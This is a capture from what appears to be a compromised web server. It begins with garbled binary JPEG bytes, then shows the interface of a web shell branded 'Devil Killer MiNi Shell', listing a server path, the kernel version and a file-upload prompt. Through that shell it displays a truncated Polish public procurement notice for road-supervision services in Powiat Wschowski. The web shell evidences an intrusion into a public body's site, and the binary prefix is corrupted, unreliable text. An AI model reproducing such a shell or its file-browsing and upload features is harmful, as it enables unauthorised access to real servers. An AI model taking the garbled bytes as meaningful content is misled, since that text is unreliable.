JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211118/0027487601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn. Rozbudowa drogi powiatowej nr 1011F Sława – Krzepielów Etap I w formule zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wschowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 977945847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Kosynierów 1c</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wschowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">65 540 48 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat.wschowa.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wschowa.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn. Rozbudowa drogi powiatowej nr 1011F Sława – Krzepielów Etap I w formule zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d63e4eb7-486f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00274876</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001682/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn. Rozbudowa drogi powiatowej nr 1011F Sława – Krzepielów Etap I w formule zaprojektuj i wybuduj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatwschowa.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>Zakupowej (dalej jako &#34;Platforma Zakupowa&#34; lub System).Wejście na platformę poprzez link:<br/>https://powiatwschowa.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej.2.Sposób komunikacji oraz wymagania formalne i<br/>techniczne dotyczące składania oświadczeń i dokumentów:a) W postępowaniu komunikacja między<br/>Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się przy<br/>użyciu Platformy. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich złożenia/wysłania na Platformie. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia wszelka korespondencja będzie kierowana do pełnomocnika. b) Zamawiający<br/>może komunikować się (z wyłączeniem składania ofert oraz oświadczeń) z Wykonawcami również za<br/>pomocą poczty elektronicznej (zamowienia@powiat.wschowa.com.pl). 3. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia<br/>2020 r. (Dz. U poz. 2452). 4. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie, tj.: a) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512kb/s, b) komputer klasy PC lub MAC o konfiguracji co najmniej:<br/>pamięć min 2GB RAM, procesor 2GHZ, jeden z systemów operacyjnych, np. MS Windows 7 lub<br/>nowszy, Mac Os x 10.4, lub nowszy lub kompatybilny system z rodziny Linux, c) zainstalowana<br/>dowolna przeglądarka internetowa obsługująca TLS 1.2 np. Internet Explorer minimalnie wersja 10.0,d)<br/>włączona obsługa JavaScript, e) zainstalowany program do odczytu plików typu .pdf np. Acrobat<br/>Reader.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiatwschowa.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Powiat Wschowski, 67-400 Wschowa, ul. Pl. Kosynierów 1c, tel. 065/540-48-00;<br/>	inspektorem ochrony danych osobowych u Zamawiającego jest Tomasz Wadas <br/>tel. 570 170 137, adres e-mail: iod@powiat.wschowa.com.pl,<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego OSE.272.13.2021 prowadzonym w trybie podstawowym zgodnie z art. 275. ust.1 ustawy;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin; <br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/><br/>W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSE.272.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy nadzoru inwestorskiego obejmuje:<br/>1) pełnobranżowy nadzór inwestorski nad realizacją w formule zaprojektuj i wybuduj inwestycji pn. „Rozbudowa drogi powiatowej nr 1011F Sława – Krzepielów Etap I.” <br/>2) udział w przekazaniu terenu budowy wykonawcy robót budowlanych,<br/>3) reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z zatwierdzoną dokumentacją projektową, harmonogramem rzeczowo-finansowym, obowiązującymi przepisami oraz zasadami wiedzy technicznej,<br/>4) systematyczne kontrolowanie budowy, co najmniej 1-raz w tygodniu oraz na każde żądanie kierownika budowy w przypadku konieczności dokonania odbioru zgłoszonego elementu robót. Dokumentem potwierdzającym obecność inspektora nadzoru na budowie będą dokonywane przez niego wpisy w dzienniku budowy. <br/>5) systematyczne informowanie Zamawiającego o zaawansowaniu robót oraz o wystąpieniu wszystkich zdarzeń mogących mieć wpływ na jakość, zakres i termin wykonania inwestycji, <br/>6) wydawanie kierownikowi budowy i kierownikom robót poleceń dotyczących usuwania stwierdzonych podczas realizacji zadania nieprawidłowości lub zagrożeń,<br/>7) nadzór nad jakością wykonywanych robót budowlanych poprzez prowadzenie systematycznej kontroli jakości wbudowywanych materiałów i wyrobów celem uniknięcia zastosowania materiałów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,<br/>8) egzekwowanie od kierownika budowy dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót,<br/>9) potwierdzanie w zakresie rzeczowym i finansowym faktycznie wykonywanych robót oraz usunięcia stwierdzonych wad, a także kontrolowanie i potwierdzanie rozliczeń wykonanych etapów robót budowlanych.<br/>10) dokonywanie odbiorów częściowych robót ulegających zakryciu lub zanikających, przyjęcie od wykonawcy skompletowanej pełnej dokumentacji powykonawczej, sprawdzenie jej kompletności poprzez dokonanie stosownej adnotacji oraz dokonanie odbioru końcowego budowy,<br/>11) w okresie gwarancyjnym obejmującym zrealizowane przedsięwzięcie uczestniczenie w przeglądach gwarancyjnych oraz uczestniczenie w odbiorze pogwarancyjnym.<br/><br/>Powierzony inspektorowi nadzoru inwestorskiego zakres inwestycji obejmować będzie:<br/>- przebudowę jezdni drogi powiatowej nr 1011F na odcinku 3869,19m polegającą na korekcie sytuacyjno-wysokościowej przebiegu osi i krawędzi jezdni, poszerzeniu i wzmocnieniu jej konstrukcji lub rozbiórkę istniejącej i budowę nowej jezdni po trasie istniejącej drogi, uwzględniając wprowadzenie niezbędnych korekt sytuacyjno-wysokościowych przebiegu osi i krawędzi jezdni,<br/>- przebudowę lub rozbudowę istniejących skrzyżowań z drogami publicznymi powiatowymi i gminnymi,<br/>- przebudowę, rozbudowę lub budowę zjazdów na drogi wewnętrzne,<br/>- przebudowę, rozbudowę lub budowę zjazdów publicznych i zjazdów indywidualnych,<br/>- przebudowę lub budowę chodników,<br/>- budowę ścieżki pieszo-rowerowej,<br/>- budowę zatok autobusowych z peronami,<br/>- budowę miejsc postojowych dla samochodów osobowych,<br/>- budowę lub przebudowę poboczy,<br/>- budowę, przebudowę lub odbudowę rowów drogowych i przepustów na tych rowach,<br/>- przebudowę rowów i przepustów melioracyjnych,<br/>- przebudowę, rozbudowę lub budowę kanalizacji deszczowej,<br/>- budowę oświetlenia ulicznego,<br/>- budowę urządzeń bezpieczeństwa ruchu drogowego (stała organizacja ruchu),<br/>- budowę kanału technologicznego,<br/>- przebudowę istniejącej infrastruktury technicznej kolidującej z rozbudowywaną drogą, w tym sieci i<br/>przyłączy elektroenergetycznych, wodociągowych i telekomunikacyjnych,<br/>- rozbiórkę ogrodzeń i innych obiektów posesji sąsiadujących z pasem drogowym w związku z ustaleniem<br/>nowego przebiegu granic pasa drogowego,<br/>- wycinkę drzew i krzewów kolidujących z inwestycją,<br/>- humusowanie i obsianie trawą terenów i pasów zieleni,<br/>- wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia,<br/><br/>Szczegółowy zakres przedsięwzięcia zawiera Program funkcjonalno – użytkowy stanowiący załącznik nr1<br/>(dokumentacja postepowania pn. „Rozbudowa drogi powiatowej nr 1011F Sława – Krzepielów Etap I w formule zaprojektuj i wybuduj” dostępna jest pod adresem: <br/>https://powiatwschowa.ezamawiajacy.pl/pn/powiatwschowa/demand/notice/public/32944/details </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które: <br/>a) zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania, <br/>b) nie zostaną odrzucone przez Zamawiającego. <br/>2. Przy wyborze najkorzystniejszej oferty, Zamawiający będzie się kierował niżej opisanymi kryteriami oceny ofert, przyjmując zasadę, że 1%=1 punkt. <br/>3. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria: <br/>1) Cena oferty brutto – 60% - 60pkt <br/>2) doświadczenie inspektora nadzoru (koordynatora inspektorów nadzoru inwestorskiego) – 20% - 20pkt <br/>3) ilość wizyt inspektora nadzoru na budowie – 20 % - 20 pkt<br/>4. Liczba przyznanych punktów w ramach ww. kryteriów zostanie obliczona według wzoru: <br/>Ad. 1. Cena oferty (cena brutto podana w Formularzu ofertowym): <br/> najniższa cena ofertowa brutto <br/>C= ---------------------------------------------------- x 100 x waga kryterium 60% <br/> cena oferty badanej <br/>Ad. 2. Przyznanie punktacji w kryterium doświadczenie inspektora nadzoru:<br/>Ocena ofert w kryterium „doświadczenie inspektora nadzoru inwestorskiego” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad: <br/><br/>Ilość zrealizowanych inwestycji	Przyznana ilość punktów<br/>1	0 pkt<br/>2	5 pkt<br/>3 10 pkt<br/>4 15 pkt<br/>5	20 pkt<br/><br/><br/>Ad. 3. Przyznanie punktacji w kryterium ilość wizyt inspektora nadzoru na budowie:<br/>Ocena ofert w kryterium „ilość wizyt inspektora nadzoru na budowie” zostanie dokonana na podstawie informacji wskazanej przez Wykonawcę w Formularzu ofertowym według poniższych zasad.<br/>Zamawiający zgodnie z rozdziałem II pkt 1 SWZ wymaga pobytu inspektora nadzoru na terenie budowy minimum 1 raz w tygodniu, każdy potwierdzony wpisem do dziennika budowy. <br/>Zgodnie z deklaracją Wykonawcy zawartą w Formularzu ofertowym, Zamawiający przyzna ofercie poniżej przedstawioną ilość punktów: <br/>•	1 wizyta na tydzień na budowie – 0 pkt<br/>•	2 wizyty na tydzień na budowie – 5 pkt<br/>•	3 wizyty na tydzień na budowie – 10 pkt <br/>•	4 wizyty na tydzień na budowie – 15 pkt<br/>•	5 wizyt na tydzień na budowie – 20 pkt<br/>W przypadku braku informacji w ofercie Wykonawcy, w zakresie oznaczenia ilości wizyt inspektora nadzoru na budowie, Zamawiający przyjmie, iż Wykonawca spełnia warunek minimalny (1 wizyta na budowie na tydzień). <br/>5.	Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: <br/>C + D + I = S <br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>C - ilość punktów przyznanych ofercie w kryterium cena<br/>D – ilość punktów przyznanych w kryterium doświadczenie inspektora nadzoru<br/>I – ilość punktów przyznanych ofercie w kryterium ilość wizyt inspektora nadzoru na budowie<br/><br/>6. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie inspektora nadzoru (koordynatora inspektorów nadzoru inwestorskiego)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość wizyt inspektora nadzoru na budowie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. Wykonawcy zobowiązani są spełniać warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia żadnego warunku w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów<br/>Zamawiający nie stawia żadnego warunku w tym zakresie3) sytuacji ekonomicznej<br/>lubfinansowej<br/>Zamawiający nie stawia żadnego warunku w tym zakresie<br/>4) zdolności technicznej lub zawodowej:<br/>Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia<br/>wykaże, że:w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował co najmniej 2 dwie usługi polegające na sprawowaniu nadzoru inwestorskiego nad robotami obejmującymi budowę, przebudowę lub rozbudowę drogi o wartości brutto nie niższej niż 2 000 000,00 zł brutto każde,<br/>b)	dysponuje osobami, które pełnić będą funkcje inspektorów nadzoru posiadający uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności: <br/>- inżynieryjnej drogowej,<br/>- instalacyjnej w zakresie sieci, instalacji 